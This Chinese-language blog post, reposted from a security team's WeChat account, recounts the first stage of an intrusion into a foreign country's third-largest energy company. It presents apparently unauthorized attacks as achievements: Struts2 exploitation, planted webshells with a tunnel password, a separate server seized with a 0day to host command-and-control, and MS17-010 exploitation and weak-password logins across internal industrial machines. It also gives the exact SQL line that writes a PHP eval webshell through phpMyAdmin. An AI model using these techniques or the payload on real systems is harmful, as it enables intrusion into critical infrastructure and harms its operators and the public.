对某国能源打点(上)

此次渗透非常感谢HashRun安全团队HashMeow小组成员协作;感谢如下师傅:闲客,伊恒,秋风,fish


对某国能源打点(上)

当然,这次渗透下来的目标的网段和资产挺不错的,某国第三大能源,网段在国家骨干网络
入口

主域名 https://www.xxxxx.com

漏洞链接 

https://vms.xxxxx.com:xxxx/xxxxxxx/xxxxxx.action

漏洞名称 Struts2

哥斯拉🐎 

https://vms.xxxxx.com:xxxx/xxxxxxx/ll.jsp

冰蝎4.0.5 Xor_base64协议  

https://vms.xxxxxx.com:xxxxx/xxxxx/xxxxx.jsp

Neo-regeorg 隧道 密码lan

https://vms.xxxx.com:xxx/xxxxxx/tunnel.jsp

这部分也是通过信息收集,看到.action直接st2一把梭

代理机部署

因为这次行动是在疫情,xj疫情当时大家应该都知道,公司没办法给我们提供匿名服务器,所以我们只能自己打一台下来,然后部署c2

伊恒哥哥一个0day梭哈下来一台bc,拿到bc之后我们开始搭建c2以及流量代理

对某国能源打点(上)

外加c2

内网信息收集

简单扫大概扫下

对某国能源打点(上)

虽然有几个段重了,问题不大,我们大概看了一下估计有6个域以上,国外内网确实安全,大概最少有600台机器(保守点估计)然后发现弱口基本就在2位数,ms17010也就个位数

先把ms17010打了,发现一个坑点,msf不能打03,08并且很容易打崩,换上大佬工具,梭哈

对某国能源打点(上)

对某国能源打点(上)

对某国能源打点(上)

不全部放图了,因为千篇一律,我们接下来看下域,发现都在域内

对某国能源打点(上)

然后大佬工具自带rdp登录模板,直接开启rdp登录

对某国能源打点(上)


发现不是远程登录组,先放下

因为入口是Linux机器,不太好当鼠标猴子,虽然有cross2加持,我们继续寻找内网中出网的机器,前面几台ms17010下来的机器进行出网探测均发现只有dns出网,然后exe丢上去稍稍有点麻烦,先放下,去看下web资产能不能getshell几个找个出网的win,毕竟内网中有几k台机器呢,总有一个出网win

对某国能源打点(上)

然后又发现一些未授权的

对某国能源打点(上)

弱口

对某国能源打点(上)

对某国能源打点(上)

太多了,不截图了

发现也没啥太大用处,先放下,继续往下看,发现一个oracle

是个普通权限,我记得是可以直接弹回shell的

对某国能源打点(上)

ok找到一个win发现还是tm不出网,只有dns出,很麻烦,上传exe又要走出口机

后续又发现一些弱口和未授权

对某国能源打点(上)


这些机器大多也是工业机器

最后找到一台所有协议都出网的win

http://10.36.32.36/?phpinfo=1进phpinfo,找到绝对路径C:wamp/www

http://10.36.32.36/phpmyadmin/未经授权进到phpmyadmin,查看权限是all

在数据表的sql直接写入

select "<?php @eval($_POST[cc]);?>" into outfile 'C:/wamp/www/shell.php'

http://10.36.32.36/log.php成功

蚁剑挂代理验证

对某国能源打点(上)

对某国能源打点(上)

后续,还没在c2上上线这个win,因为我在准备期末考试,期末考完之后,我又被别人支配的去整代码审计,整完这些快过年了

下一步计划就是经行域渗透吧,整整pth,ptt,ptk等,这些,到时候再更新

原文始发于微信公众号(HashRun安全团队):对某国能源打点(上)

版权声明:admin 发表于 2023年1月17日 下午10:58。
转载请注明:对某国能源打点(上) | CTF导航

相关文章

暂无评论

暂无评论...